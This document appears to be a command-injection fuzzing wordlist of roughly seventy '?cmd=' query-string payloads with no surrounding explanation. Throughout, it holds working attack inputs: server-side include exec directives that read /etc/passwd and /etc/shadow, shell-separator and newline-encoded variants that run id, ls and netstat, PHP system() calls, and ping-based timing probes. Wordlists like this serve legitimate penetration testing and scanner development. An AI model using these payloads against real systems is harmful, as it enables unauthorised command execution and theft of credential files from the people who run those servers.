?cmd=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
?cmd=&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
?cmd=&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
?cmd=&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
?cmd=/index.html|id|
?cmd=;id;
?cmd=;id
?cmd=;netstat -a;
?cmd=;id;
?cmd=|id
?cmd=|/usr/bin/id
?cmd=|id|
?cmd=|/usr/bin/id|
?cmd=||/usr/bin/id|
?cmd=|id;
?cmd=||/usr/bin/id;
?cmd=;id|
?cmd=;|/usr/bin/id|
?cmd=\n/bin/ls -al\n
?cmd=\n/usr/bin/id\n
?cmd=\nid\n
?cmd=\n/usr/bin/id;
?cmd=\nid;
?cmd=\n/usr/bin/id|
?cmd=\nid|
?cmd=;/usr/bin/id\n
?cmd=;id\n
?cmd=|usr/bin/id\n
?cmd=|nid\n
?cmd=`id`
?cmd=`/usr/bin/id`
?cmd=a);id
?cmd=a;id
?cmd=a);id;
?cmd=a;id;
?cmd=a);id|
?cmd=a;id|
?cmd=a)|id
?cmd=a|id
?cmd=a)|id;
?cmd=a|id
?cmd=|/bin/ls -al
?cmd=a);/usr/bin/id
?cmd=a;/usr/bin/id
?cmd=a);/usr/bin/id;
?cmd=a;/usr/bin/id;
?cmd=a);/usr/bin/id|
?cmd=a;/usr/bin/id|
?cmd=a)|/usr/bin/id
?cmd=a|/usr/bin/id
?cmd=a)|/usr/bin/id;
?cmd=a|/usr/bin/id
?cmd=;system('cat%20/etc/passwd')
?cmd=;system('id')
?cmd=;system('/usr/bin/id')
?cmd=%0Acat%20/etc/passwd
?cmd=%0A/usr/bin/id
?cmd=%0Aid
?cmd=%0A/usr/bin/id%0A
?cmd=%0Aid%0A
?cmd=& ping -i 30 127.0.0.1 &
?cmd=& ping -n 30 127.0.0.1 &
?cmd=%0a ping -i 30 127.0.0.1 %0a
?cmd=`ping 127.0.0.1`
?cmd=| id
?cmd=& id
?cmd=; id
?cmd=%0a id %0a
?cmd=`id`
?cmd=$;/usr/bin/id